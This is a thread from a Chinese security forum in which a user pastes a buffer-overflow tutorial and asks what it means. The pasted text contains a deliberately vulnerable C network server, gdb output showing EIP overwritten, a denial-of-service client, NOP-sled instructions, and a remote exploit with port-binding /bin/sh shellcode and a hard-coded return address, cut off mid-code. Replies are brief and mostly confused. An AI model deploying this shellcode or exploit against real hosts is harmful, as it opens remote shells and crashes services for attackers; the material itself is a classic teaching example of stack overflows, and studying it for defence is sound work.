|
 | 作者: steaven [steaven]
 论坛用户 |
登录 |
| gdb) x/200bx $esp-200 0xbffff5cc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff5d4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff5dc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff5e4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff5ec: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff5f4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff5fc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff604: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff60c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff614: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff61c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff624: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff62c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff634: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff63c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff644: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff64c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff654: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff65c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff664: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff66c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff674: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff67c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 ---Type <return> to continue, or q <return> to quit--- 我的 信箱是steavenwong@163.com;请指教! |
| 地主 发表时间: 06/19 22:09 |
 | 回复: genius_li [genius_li]  论坛用户 |
登录 |
|
这是内存中的数据吧,你问这个干吗?????????????? |
| B1层 发表时间: 06/20 13:22 |
| 回复: steaven [steaven] 论坛用户 |
登录 |
|
你可以解释吗?我不是太懂的呀 ! |
| B2层 发表时间: 06/21 21:16 |
| 回复: genius_li [genius_li] 论坛用户 |
登录 |
|
它就是内存从0xbffff5cc到0xbffff67c中的内容,你用debug查看内存都是这样的数据。在这一区域中的内容全都是0x41这并不能代表什么,它只是说内存的内容是0x41。你可以告诉我这是哪儿来的吗?也许我能进一步帮你。 |
| B3层 发表时间: 06/21 21:30 |
| 回复: steaven [steaven] 论坛用户 |
登录 |
|
那我都copy给你好了! 这好象是利用缓冲区发垃圾文件什么的吧? 可我有好些东西看不懂的呀! 你可以解释给我吗?谢谢!!:――) #include <stdio.h> #include <netdb.h> #include <netinet/in.h> #define BUFFER_SIZE 1024 #define NAME_SIZE 2048 int handling(int c) { char buffer[BUFFER_SIZE], name[NAME_SIZE]; int bytes; strcpy(buffer, "My name is: "); bytes = send(c, buffer, strlen(buffer), 0); if (bytes == -1) return -1; bytes = recv(c, name, sizeof(name), 0); if (bytes == -1) return -1; name[bytes - 1] = ’\0’; sprintf(buffer, "Hello %s, nice to meet you!\r\n", name); bytes = send(c, buffer, strlen(buffer), 0); if (bytes == -1) return -1; return 0; } int main(int argc, char *argv[]) { int s, c, cli_size; struct sockaddr_in srv, cli; if (argc != 2) { fprintf(stderr, "usage: %s port\n", argv[0]); return 1; } s = socket(AF_INET, SOCK_STREAM, 0); if (s == -1) { perror("socket() failed"); return 2; } srv.sin_addr.s_addr = INADDR_ANY; srv.sin_port = htons( (unsigned short int) atol(argv[1])); srv.sin_family = AF_INET; if (bind(s, &srv, sizeof(srv)) == -1) { perror("bind() failed"); return 3; } if (listen(s, 3) == -1) { perror("listen() failed"); return 4; } for(;;) { c = accept(s, &cli, &cli_size); if (c == -1) { perror("accept() failed"); return 5; } printf("client from %s", inet_ntoa(cli.sin_addr)); if (handling(c) == -1) fprintf(stderr, "%s: handling() failed", argv[0]); close(c); } return 0; } user@linux:~/ > gcc vulnerable.c -o vulnerable user@linux:~/ > ./vulnerable 8080 ../vulnerable 8080 说明你能在8080端口运行该项服务 user@linux~/ > gdb vulnerable GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-suse-linux"... (gdb) run 8080 Starting program: /home/user/directory/vulnerable 8080 现在该程序监听8080端口并等待连接。 user@linux:~/ > telnet localhost 8080 Trying ::1... telnet: connect to address ::1: Connection refused Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. My name is: Robin , nice to meet you! Connection closed by foreign host. user@linux:~/ > 看来没有什么破绽,但是这时gdb会在屏幕上显示: client from 127.0.0.1 0xbffff28c (访地址因不同机器类型而异) 重新连上该服务,为 "My name is:..." 命令行提供超过102入: user@linux:~/ > telnet localhost 8080 Trying ::1... telnet: connect to address ::1: Connection refused Trying 127.0.0.1... Connected to localhost. Escape character is '^]'. My name is: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAA 连接将中断,让我们看看gdb的输出: Program received signal SIGSEGV, Segmentation fault. 0x41414141 in ?? () (gdb) // Don’t close gdb !! 能够看出 eip 被设到了 0x41414141。0x41 代表一个"A",当我们输入1024个字节时,该程序 会试图将字符串name[2048]拷入缓冲[1024]。因此,由于 name[2048] 大于1024字节,name 将会重写缓冲并重写已被存储的 eip,我们的缓冲将会是下列形式: [xxxxxxxx-name-2048-bytes-xxxxxxxxxx] [xxxxx buffer-only-1024-bytes xxx] [EIP] 在你重写了整个返回地址后,函数将会跳转到错误的地址 0x41414141,从而产生片断错误 。 现在为此程序写一个拒绝服务攻击工具: #include <stdio.h> #include <netinet/in.h> #include <sys/socket.h> #include <sys/types.h> #include <netdb.h> int main(int argc, char **argv) { struct sockaddr_in addr; struct hostent *host; char buffer[2048]; int s, i; if(argc != 3) { fprintf(stderr, "usage: %s <host> <port>\n", argv[0]); exit(0); } s = socket(AF_INET, SOCK_STREAM, 0); if(s == -1) { perror("socket() failed\n"); exit(0); } host = gethostbyname(argv[1]); if( host == NULL) { herror("gethostbyname() failed"); exit(0); } addr.sin_addr = *(struct in_addr*)host->h_addr; addr.sin_family = AF_INET; addr.sin_port = htons(atol(argv[2])); if(connect(s, &addr, sizeof(addr)) == -1) { perror("couldn't connect so server\n"); exit(0); } /* Not difficult only filling buffer with A’s.... den sending nothing more */ for(i = 0; i < 2048 ; i++) buffer[i] = 'A'; printf("buffer is: %s\n", buffer); printf("buffer filled... now sending buffer\n"); send(s, buffer, strlen(buffer), 0); printf("buffer sent.\n"); close(s); return 0; } (gdb) x/200bx $esp-200 0xbffff5cc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff5d4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff5dc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff5e4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff5ec: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff5f4: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff5fc: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff604: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff60c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff614: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff61c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff624: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff62c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff634: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff63c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff644: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff64c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff654: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff65c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff664: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff66c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff674: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0xbffff67c: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 ---Type <return> to continue, or q <return> to quit--- 1、 找到 esp,然后找一个能绑定 shell 到端口的 sehllcode. 2、创建一个大于1024字节的缓冲 2、 用 NOP 填�M整个缓冲: memset(buffer, 0x90, 1064); 3、将 shellcode 拷入缓冲 memcpy(buffer+1001-sizeof(shellcode), shellcode, sizeof(shellcode)); 4、在缓冲中消除零字节: buffer[1000] = 0x90; // 0x90 is the NOP in hexadecimal 5、在缓冲未端拷贝返回地址: for(i = 1022; i < 1059; i+=4) { ((int *) &buffer[i]) = RET; // RET is the returnaddress we want to use... #define in the header } 6、在准备好的缓冲未端加入一个 \0 零字节: buffer[1063] = 0x0; 现在可以把它发送给有漏洞机器了。 /* Simple remote exploit, which binds a shell on port 3789 * by triton * * After return address was overwritten, you can connect * with telnet or netcat to the victim host on Port 3789 * After you logged in... there’s nothing, but try to enter "id;" (don’t forget the semicolon) * So you should get an output, ok you’ve got a shell *g*. Always use: * * <command>; * * execute. */ #include <stdio.h> #include <netdb.h> #include <netinet/in.h> //Portbinding Shellcode char shellcode[] = "\x89\xe5\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8" "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89" "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0" "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd" "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9" "\xb2\x3f\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x18\x5e\x89\x75" "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08" "\x8d\x55\x0c\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh"; //standard offset (probably must be modified) #define RET 0xbffff5ec int main(int argc, char *argv[]) { char buffer[1064]; int s, i, size; struct sockaddr_in remote; struct hostent *host; if(argc != 3) { printf("Usage: %s target-ip port\n", argv[0]); return -1; } // filling buffer with NOPs memset(buffer, 0x90, 1064); //copying shellcode into buffer memcpy(buffer+1001-sizeof(shellcode) , shellcode, sizeof(shellcode)); // the previous statement causes a unintential Nullbyte at buffer[1000] buffer[1000] = 0x90; // Copying the return address multiple times at the end of the buffer... for(i=1022; i < 1059; i+=4) { * ((int *) &buffer[i]) = RET; } buffer[1063] = 0x0; //getting hostname host=gethostbyname(argv[1]); if (host==NULL) { fprintf(stderr, "Unknown Host %s\n",argv[1]); return -1; } // creating socket... s = socket(AF_INET, SOCK_STREAM, 0); if (s < |
| B4层 发表时间: 06/21 21:44 |
| 回复: genius_li [genius_li] 论坛用户 |
登录 |
|
你这个程序我最近因为考试所以没空看,等我们考试完后,我再看,然后给你答复。 |
| B5层 发表时间: 06/21 22:14 |
| 回复: steaven [steaven] 论坛用户 |
登录 |
|
这好象是用C++做的,可我不会呀,我只可以看C sharp的! 你最好把她它们译成C sharp。好吗? |
| B6层 发表时间: 06/22 12:09 |
| 回复: genius_li [genius_li] 论坛用户 |
登录 |
|
等放假吧,我有时间一定帮你看。 |
| B7层 发表时间: 06/23 11:14 |
| 回复: freeid [zjx_1981] 论坛用户 |
登录 |
|
应该是一个扫描程序吧@我想是的! |
| B8层 发表时间: 07/08 14:22 |
| 回复: steaven [steaven] 论坛用户 |
登录 |
|
当然是呀,你可以解释给我吗? |
| B9层 发表时间: 07/16 13:00 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 编程破解
标题: 请大虾们看看!这是什么 ?